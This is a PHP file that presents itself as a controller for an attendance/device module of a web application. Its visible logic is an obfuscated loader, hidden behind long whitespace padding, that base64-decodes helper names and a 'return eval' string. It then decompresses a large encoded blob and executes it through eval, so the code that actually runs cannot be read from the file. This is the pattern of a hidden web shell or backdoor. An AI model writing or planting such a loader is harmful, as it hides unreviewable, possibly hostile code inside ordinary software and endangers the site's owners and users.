<?php 
        $__='printf';$_='Loading donjo-app/controllers/kehadiran/Perangkat.php';
        























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































































                                                                                                                                                                                                                     $________;
